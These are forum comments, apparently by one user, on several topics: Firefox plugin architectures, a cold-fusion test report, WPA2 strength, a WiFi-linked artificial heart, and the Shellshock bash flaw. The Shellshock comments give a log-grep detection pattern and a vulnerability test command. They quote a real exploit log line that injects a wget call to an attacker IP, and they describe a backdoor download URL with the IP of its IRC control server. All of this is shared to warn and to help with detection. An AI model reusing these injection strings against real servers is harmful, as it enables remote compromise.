I guess it could - firefox's plugin-container is compiled for the same arch as the browser itself though (so if you install firefox 32 bits, you'll get the 32 bits plugin-container).

A quick search seems to suggest it would be theoretically possible to have an 64 bits firefox talking to a 32 bits plugin-container loading, say, the flash plugin; it appears however that that would require an IPC bridge between both process to perform some sort of conversion (this suggests that somehow the way both process communicate is arch dependent ? I don't know enough about xulrunner to confirm).
There's a compatibility layer that apparently exists to do exactly that: nspluginwrapper.

Myself, I tend to avoid the headache and simply run the 32 bits version of Firefox even on an amd64 system.

I suspect he was talking about firefox plugins (flash, java, the google hangouts one, etc.), not add-ons. The plugins are indeed dynamically loaded libraries that need to be compiled for the same architecture as the browser itself in order to be loaded.

It's actually Toyota (and makes a lot more sense) - my bad.

No. The entire experiment was setup by the researchers themselves; the lab has no connection to Rossi, and none of the equipment came or was set-up by him. His only implication was to be here for the initial "fuel" insertion and the ash retrieval at the end, while being monitored (though that's more than enough to be suspicious of the alleged transmutation and suspect some sort of swap - still, it doesn't explain the excess energy).

Agreed on this - it should be noted, though, that Rossi is not the only one that claims excess energy and transmutation using these kinds of mechanisms; look up for example the MIT NANOR devide (a small scale device that put out excess energy for more than one month straight), or the Mitsubishi transmutation claims in similar devices (later replicated by Toshiba). There are also other companies claiming similar things (Brillouin for one).

If this thing works (and that's obviously a big if), then I'd suspect Rossi discovered this mostly by accident, and that he has no precise idea himself of how it actually produces energy. IIRC, the few initial theories proposed are based on the idea of nano-scale lattices with trapped hydrogen inside; combined with some sort of excitation (EM usually, although not the only one that apparently produced some results) allowing somehow for the Coulomb barrier to be overcome at those scales and for a limited-scale, radiation-less (how ?) fusion to occur.

This is of course all pretty impossible given our current understanding of physics so if it does work somehow, it's wonderful news, even if it cannot be harnessed for energy; because it might lead to new, exciting physics.

Read the report (specifically page 8 and annex 2) - they actually analyzed the device's coating material. It was made of Al2O3 (and this was taken into account in the calorimetry), with no obvious other compounds.

While there are possible calorimetry issues here, it's hard to see an obvious one that would explain such a large measurement error; alumina IR transparency has been considered, as well as IR calibration issues (especially given the imperfect dummy test); both do not appear to be valid critics (see my comment here for details).

Given the extraordinary claims, extraordinary evidence is obviously required here; and this report definitely isn't that. Its experimental protocol and the results obtained are however more than enough to warrant further investigation; which may be hard given that this isn't like a "classical" experiment, that can be easily replicated - you basically need Rossi/Industrial Heat (the company that acquired Rossi's device and tech) to provide you with his black box and stay the hell away from the test (this is the first time he actually did that; and even here he couldn't help himself being present for the initial "fuel" insertion and the ash extraction at the end of the experiment - which render the isotopic changes inevitably suspicious).

Nope, that was true in the first test, not this one. None of the instruments came or were set up by Rossi. This test didn't occur in his lab, but in a neutral lab with controlled access. He was however present for the loading of the initial "fuel" and the extraction of the ash at the end of the test (which was stupid, and suspicious - especially given the witnessed isotopic changes in the ash).

Even assuming he did some swap on the ash itself, though, it does not explain the witnessed extra heat output (which even with extremely conservative estimates in the paper sets a CoP at ~3.6).
Now, their calorimetry is far from perfect - there were initial concerns about alumina (the device's main material) transparency to IR, for example; those have been put to rest given the fact that the IR camera used works above 7um wavelengths and at those ranges, transparency isn't an issue. Another concern (stressed by other people above) is the whole way the IR camera itself was calibrated and set-up - however, the IR cam was a new, never before used one, and they simply tested its calibration. Even if the measures are off due to the bad calorimetry, there is no obvious way it could translate into an error of that magnitude without some other obvious signs of it (like crazy differences between the hotter "segments" of the device and others, colder ones). And once again, they made all of their calculation using very conservative estimates and taking into account all margins of error.

As for the researchers themselves, they are far from disreputable (except maybe for Levi in this specific context); they are engaging their reputation by publishing this and one of them, Hanno Essen, is also the head of the Swedish Skeptics Society and has at least some experience in dealing with crackpots and suspicious "revolutionary" inventions.

This does warrant further research; beyond ad hominem attacks on Rossi, I haven't seen any strong critic of the experimental protocol that hasn't been quickly debunked (except for the transmutation thing; that could be explained by Rossi doing some sort of swap. It should be noted that he was watched at all time by several people though).

My bad - indeed it is.

No - there actually need to be a bash CGI script for it to work; as long as you have only 404 codes you are fine.

It's not the only botnet being constructed, see my comment here - already 653 exploited servers there right now.
This is quite bad - as long as a bash CGI script is found by probing, exploiting only require putting a bash command in a header such as "Cookie:" for it to be executed. And this is only through HTTP - there are also aready other proof of concepts exploiting this through other bash-using services (DHCP servers for example).
You can check if you've been scanned for exploitable CGIs using something like (adjust apache logs path accordingly):

grep cgi /var/log/apache2/access*|egrep "};|}\s*;"

And you can check if your bash is vulnerable using:

env x='() { :;}; echo vulnerable' bash -c 'echo Testing...'

If 'vulnerable' appears, it is.

Another one attempts to download and execute h t t p ://213.5.67.223/jurat , a perl backdoor that'll connect to a control IRC server (46.16.170.158 port 443), presumably so that a botnet can be constructed. It allows for port scanning and DDOSing remote targets based on IRC commands received.

And right now, there are already 560 invisible users connected there... and it grows at quite a pace. The flaw is definitely being exploited in the wild.

Just saw this in the server logs on one of our servers:

82.165.144.187 - - [25/Sep/2014:18:55:59 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 392 "-" "() { :; }; /usr/bin/wget 82.165.144.187/bbbbbbbbbbbb"

An attempt at exploiting the vulnerability (trying to wget h t t p : // 82.165.144.187/bbbbbbbbbbbb to confirm the system is vulnerable).

The only thing that link proves is that WPA2-PSK is secure as long as you choose a long enough password.

Of course you can capture a handshake and try and bruteforce the password. But as long as said password is long enough, and even with GPU-assisted cracking, you'll die before you even go through a thousandth of the possibility space.
Security doesn't have to be perfect - if it turns out eventually that hardware advances or a flaw in the implementation makes an attack even remotely feasible, then you'll surely be able to update the heart's firmware or even, worst case scenario, to replace it. For the time being, it's good enough. And even if an attack is possible (jamming seems certainly possible, for example, and would prevent adjusting the heart rate for the duration), the device should never obey any command that may put the user at risk - IE, never go below a certain rate.

Meanwhile, the people this device is implanted in wouldn't even be alive without it. And shit, we're talking about a completely artificial heart, currently being implanted in humans, the first one of which allowed its wearer to last for 76 days (an impressive success by all accounts). This is the stuff of science fiction. The WIFI aspect hardly seems relevant compared to this - and yet 90% of the comments seem to focus on that. How depressing.